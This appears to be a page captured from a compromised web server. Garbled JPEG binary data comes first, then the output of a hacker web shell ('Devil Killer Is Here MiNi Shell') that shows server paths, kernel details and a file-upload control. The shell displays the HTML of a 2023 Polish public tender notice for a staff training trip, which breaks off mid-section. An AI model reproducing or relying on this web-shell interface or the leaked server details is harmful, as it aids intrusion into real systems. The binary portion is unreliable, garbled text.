JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20230313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20230313/0013221201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa organizacji wyjazdowego szkolenia dla pracowników Małopolskiego Centrum Przedsiębiorczości. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Małopolskie Centrum Przedsiębiorczości</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 120592230</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jasnogórska 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-358</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">123769100</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">123769120</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mcp.malopolska.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mcp.malopolska.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa organizacji wyjazdowego szkolenia dla pracowników Małopolskiego Centrum Przedsiębiorczości. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1bcb9623-bcdb-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00132212</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00064898/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa organizacji wyjazdowego szkolenia dla pracowników Małopolskiego Centrum Przedsiębiorczości</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusze Europejskie dla Małopolski 2021 - 2027. Pomoc Techniczna. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-1bcb9623-bcdb-11ed-b8d9-2a18c1f2976f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Podstawowym narzędziem komunikacji między Zamawiającym a Wykonawcami jest platforma e-Zamówienia dostępna pod adresem: https://ezamowienia.gov.pl. <br/>W przypadku problemów technicznych lub awarii w jej funkcjonowaniu , zamawiający dopuszcza możliwość składania dokumentów elektronicznych, z wyjątkiem składania i wycofywania ofert, zapytań o wyjaśnienie treści specyfikacji warunków zamówienia, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą dedykowanego formularza: „Formularz do komunikacji” dostępnego na platformie ePUAP (w wyszukiwarce podmiotu należy wpisać „Małopolskie Centrum Przedsiębiorczości”). Elektroniczna skrzynka podawcza: /MCP/przetargi lub za pomocą poczty elektronicznej na adres e-mail: sekretariat@mcp.malopolska.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. Korzystanie z Platformy e-Zamówienia jest bezpłatne. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na platformie e-Zamówienia ani nie wymaga logowaniaWymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE. L. z 2016 r. Nr 119, str. 1; zm.: Dz. U. UE. L. z 2018 r. Nr 127, str. 2.), dalej „RODO”, informuję, że: <br/>administratorem Państwa danych osobowych jest Małopolskie Centrum Przedsiębiorczości (dalej: MCP) z siedzibą w Krakowie, ul. Jasnogórska 11, 31-358 Kraków;<br/>we wszelkich sprawach związanych z przetwarzaniem Państwa danych osobowych przez Małopolskie Centrum Przedsiębiorczości i w celu realizacji swoich praw mogą się Państwo skontaktować się z naszym Inspektorem Ochrony Danych dostępnym pod adresem e-mail: dane_osobowe@mcp.malopolska.pl , pisemnie na wskazany powyżej adres siedziby Małopolskiego Centrum Przedsiębiorczości lub osobiście w siedzibie MCP;<br/>Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pod nazwą „Usługa organizacji wyjazdowego szkolenia dla pracowników Małopolskiego Centrum Przedsiębiorczości”, prowadzonym w trybie podstawowym, bez przeprowadzenia negocjacji na podstawie artykułu 275 punkt 1 ustawy Pzp, znak referencyjny: NO.271.2.2023;<br/>odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2022 roku, pozycja 1710 z późn. zm.), dalej: „ustawa Pzp” oraz uprawnione organy kontrolne;<br/>Państwa dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 i 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy lub zgodnie z okresem archiwizacji określonym w art. 140 Rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 1303/2013 z dnia 17 grudnia 2013 r. ustanawiającego wspólne przepisy dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego, Funduszu Spójności, Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich oraz Europejskiego Funduszu Morskiego i Rybackiego oraz ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego, Funduszu Spójności i Europejskiego Funduszu Morskiego i Rybackiego oraz uchylającego rozporządzenie Rady (WE) nr 1083/2006 (Dz. U. UE. L. z 2013 r. Nr 347, str. 320 z późn. zm.), w zależności od tego, który z tych okresów nastąpi później.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NO.271.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 171140,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa organizacji szkolenia wyjazdowego dla pracowników Małopolskiego Centrum Przedsiębiorczości.<br/>Przedmiot zamówienia współfinansowany jest ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego w ramach Pomocy Technicznej Programu Fundusze Europejskie dla Małopolski na lata 2021-2027 oraz z projektu zintegrowanego LIFE EKOMAŁOPOLSKA – „Wdrażanie Regionalnego Planu Działań dla Klimatu i Energii dla województwa małopolskiego”, współfinansowanego ze środków instrumentu finansowego LIFE w ramach środków Unii Europejskiej oraz Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej (z budżetu Województwa Małopolskiego) oraz z budżetu województwa małopolskiego na 2023 rok.<br/>Nabywana usługa szkoleniowa ma charakter usługi kształcenia zawodowego pracowników i jest w całości finansowana ze środków publicznych.<br/>Temat szkolenia:<br/>1. Dzień: Nowelizacja Kodeksu pracy, nowe przywileje i obowiązki pracowników wprowadzone w 2023 roku.<br/>2. Dzień: Szkolenia wewnętrzne. Wybrane zagadnienia z zakresu BHP i bezpieczeństwa informacji.<br/>Liczba uczestników: maksymalnie 172 pracowników, nie mniej niż 134 pracowników.<br/>Zastrzeżenie: Zamawiający ma prawo do zmniejszenia liczby uczestników szkolenia o maksymalnie 38 osób, informując o tym Wykonawcę na pięć dni przed wykonaniem usługi.<br/>Liczba grup: 1 grupa szkoleniowa, złożona ze wszystkich uczestników szkolenia.<br/>Liczba godzin: 7 godzin dydaktycznych z zakresu nowelizacji prawa pracy, 5 godzin dydaktycznych z zakresu BHP i bezpieczeństwa informacji. 1 godzina dydaktyczna = 45 minut.<br/>Termin realizacji: 20 – 21 kwietnia 2023 r., dwa dni szkoleniowe.<br/>Miejsce szkolenia: hotel/obiekt konferencyjny, minimum trzygwiazdkowy, poza granicami miasta Krakowa, na terenie województwa małopolskiego. Całe zadanie musi być zrealizowane zgodnie z harmonogramem, w obrębie jednego obiektu. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79632000-3 - Szkolenie pracowników</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55100000-1 - Usługi hotelarskie</p> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <p class="mb-0">60140000-1 - Nieregularny transport osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-04-20 do 2023-04-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Punkty za kryterium Cena (K1) zostaną obliczone według wzoru: K1 = Najniższa cena spośród złożonych ofert/Cena oferty rozpatrywanej*100* 60%. Maksymalna liczba punktów możliwa do uzyskania przez Wykonawcę w kryterium Cena wynosi 60 punktów.<br/>b.	Punkty za kryterium (K2) kwalifikacje osoby prowadzącej szkolenie, zwaną dalej także trenerem lub trenerką.<br/>Kwalifikacje osoby prowadzącej szkolenie będą oceniane na podstawie:<br/>- doświadczenia w prowadzeniu wykładów, które posiada osoba wskazana w ofercie.<br/>Jeśli osoba prowadząca szkolenie, w ciągu ostatnich trzech lat przed upływem terminu składania ofert, prowadziła wykłady dla studentów studiów stacjonarnych lub studiów niestacjonarnych lub słuchaczy studiów podyplomowych z zakresu prawa pracy, to Wykonawca otrzyma 10 punktów, gdy wraz z ofertą złoży dokument/dokumenty wystawione przez uczelnię wyższą potwierdzające to doświadczenie.<br/>- doświadczenia w prowadzeniu w osobistej realizacji usług konsultacji lub poradnictwa prawnego, lub prowadzenia spraw z zakresu objętego programem szkolenia. Jeśli osoba wskazana do prowadzenia szkolenia, w ciągu ostatnich trzech lat przed upływem terminu składania ofert, zrealizowała przynajmniej jedną usługę jako konsultant, lub radca prawny lub osoba prowadząca sprawy z zakresu objętego programem szkolenia, to Wykonawca otrzyma 10 punktów, gdy wraz z ofertą złoży dokument wystawiony przez firmę lub instytucję lub organ lub jednostkę lub instytucję sektora publicznego lub inny podmiot rejestrowany (na przykład: stowarzyszenie, fundację) potwierdzające to doświadczenie, z wyłączeniem dokumentów wystawionych przez osoby fizyczne nieprowadzące działalności gospodarczej.<br/>- doświadczenia w prowadzeniu szkoleń, (z wyłączeniem szkoleń wewnętrznych dla pracowników w podmiocie, w okresie, w którym ta osoba była lub jest zatrudniona), na podstawie liczby szkoleń z tematów objętych programem szkolenia, które osoba wskazana w ofercie przeprowadziła w okresie ostatnich trzech lat przed upływem terminu składania ofert, pod warunkiem, że Wykonawca dołączy do wykazu szkoleń dokumenty, potwierdzające należyte ich wykonanie przez trenera lub trenerkę.<br/>Wykaz szkoleń podlegających ocenie Zamawiającego w ramach kryterium oceny ofert należy sporządzić z wykorzystaniem wzoru stanowiącego załącznik nr 4 do SWZ.<br/>Wykonawca otrzyma 1 punkt, za każde przeprowadzone szkolenie, maksymalnie za dziesięć szkoleń, z tematu objętego programem szkolenia wraz z załączonym dokumentem potwierdzającym, że szkolenie przeprowadzone przez trenera lub trenerkę szkolenia, wskazanego w ofercie, zostało przez niego wykonane należycie.<br/>Łączna maksymalna liczba punktów możliwa do uzyskania przez Wykonawcę w kryterium Kwalifikacje osoby prowadzącej szkolenie wynosi 30 punktów, w tym:<br/>10 punktów za doświadczenie w prowadzeniu wykładów z zakresu prawa pracy,<br/>10 punktów za doświadczenie w prowadzeniu konsultacji lub poradnictwa prawnego lub prowadzenia spraw z zakresu objętego programem szkolenia,<br/>10 punktów za doświadczenie w prowadzeniu szkoleń z zakresu objętego programem szkolenia.<br/>3. Punkty za kryterium (K3) Standard hotelu/obiektu, w którym będzie realizowana usługa.<br/>Standard hotelu/obiektu, w którym będzie realizowana usługa należy podać w tabeli znajdującej się w formularzu oferty, zgodnie z instrukcją tam zawartą. załączniku nr 2 do SWZ.<br/>Standard hotelu/obiektu należy podać zgodnie z Ewidencją Obiektów Hotelarskich prowadzoną przez Marszałka Województwa<br/>Małopolskiego, według stanu aktualnego na dzień składania ofert.<br/>Liczba punktów możliwa do uzyskania przez Wykonawcę w kryterium „Standard hotelu/obiektu, w którym będzie realizowana<br/>usługa” wynosi maksymalnie 10 punktów.<br/>Szczegółowy opis kryteriów oceny znajduje się w Rozdziale 18. SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje osoby prowadzącej szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Standard hotelu/obiektu, w którym będzie realizowana usługa.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z art. 112 ust. 2 ustawy Pzp, Zamawiający wskazuje Wykonawcy, następujące warunki udziału w postępowaniu, które powinien spełnić, aby móc biegać się o udzielenie zamówienia:<br/>1.	Posiadanie uprawnienia do prowadzenia określonej działalności gospodarczej.<br/>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca będzie posiadał, aktualny na dzień składania ofert, wpis do Centralnej Ewidencji Organizatorów Turystyki i Przedsiębiorców Ułatwiających Nabywanie Powiązanych Usług Turystycznych, o którym mowa w ustawie z dnia 24 listopada 2017 roku, o imprezach turystycznych i powiązanych usługach turystycznych (tekst jednolity: Dz. U. z 2022 roku, pozycja 511 z późn. zm.).<br/>Zamawiający zweryfikuje spełnienie tego warunku na podstawie wydruku, który pobierze, po otwarciu ofert, ze strony internetowej Ubezpieczeniowego Funduszu Gwarancyjnego: https://ewidencja.ufg.pl/ewidencja/obywatel/ksiegi.<br/>2.	Posiadanie zdolności technicznej lub zawodowej.<br/>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, że<br/>dysponuje jedną osobą (wykładowcą lub trenerem lub trenerką szkolenia), która:<br/>- posiada wiedzę i praktyczne umiejętności związane z programem szkolenia i w ciągu ostatnich trzech lat przed upływem terminu składania ofert pracowała, lub wykonywała usługi w ramach działalności gospodarczej, lub wykonywała zlecenia z tej dziedziny i<br/>- posiada doświadczenie w prowadzeniu szkoleń dla osób dorosłych związanych z tematem szkolenia objętego przedmiotem zamówienia i/lub z zakresu rozwoju kompetencji psychologicznych człowieka, zwanymi także kompetencjami miękkimi. To znaczy, przeprowadziła szkolenia lub warsztaty szkoleniowe w tym zakresie, z wyłączeniem szkoleń wewnętrznych dla pracowników w podmiocie, w którym jest lub była zatrudniona.<br/>Zamawiający zweryfikuje spełnienie tego warunku na podstawie oświadczenia Wykonawcy <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty składanej w odpowiedzi o zamówieniu, wykonawca dołącza oświadczenie o spełnieniu warunków udziału w postępowaniu - oświadczenie o niepodleganiu wykluczeniu. Szczegółowe informacje podano w rozdziale 7. Specyfikacji Warunków zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty składanej w odpowiedzi o zamówieniu, wykonawca dołącza oświadczenie o spełnieniu warunków udziału w postępowaniu - oświadczenie o niepodleganiu wykluczeniu. Szczegółowe informacje podano w rozdziale 7. Specyfikacji Warunków zamówienia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie będzie wymagał złożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca wraz z ofertą składa oświadczenie w formie dokumentu pod nazwą &#34;Doświadczenie osoby wskazanej do przeprowadzenia szkolenia&#34;. Do oświadczenia wykonawca dołącza dokumenty potwierdzające doświadczenie posiadane przez osobę wskazaną do prowadzenia szkolenia.<br/>Uwaga. Wykonawca, który składa ofertę, nie może sam potwierdzić, że osoba wskazana do prowadzenia szkolenia wykonała pracę lub usługę lub prawidłowo przeprowadziła szkolenie dla innego podmiotu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty 